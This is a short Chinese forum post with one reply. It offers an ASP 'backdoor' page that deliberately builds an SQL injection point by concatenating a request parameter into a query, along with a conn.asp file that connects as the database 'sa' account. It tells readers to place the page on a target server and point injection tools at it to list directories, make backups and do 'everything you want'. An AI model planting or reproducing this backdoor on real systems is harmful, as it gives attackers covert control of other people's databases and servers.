超级另类后门 自己构造注入表

刘炜拽哦

虽然能构建注入，但是存在局限性的！
　　<!--#include file="conn.asp"-->
　　<%
　　dim rs,strSQL,id
　　set rs=server.createobject("ADODB.recordset")
　　id = request("id")
　　strSQL = "select * from admin where id=" & id
　　rs.open strSQL,conn,1,3
　　rs.close
　　%>
　　把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名，注意必须存在。
　　然后输入:http://目标IP/zhuru.asp?id=1
　　就这么简单,然后用注入工具扫描这个注入点,列目录,备份,一切你想做的!
　　－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
　　conn.asp文件代码:
　　<%
　　strSQLServerName = "127.0.0.1" '服务器名称或地址
　　strSQLDBUserName = "sa" '数据库帐号
　　strSQLDBPassword = "123456789" '数据库密码
　　strSQLDBName = "db_database" '数据库名称
　　Set conn = Server.CreateObject("ADODB.Connection")
　　strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
　　conn.open strCon
　　%>

玩世好恭

第一次这么高的沙发。。。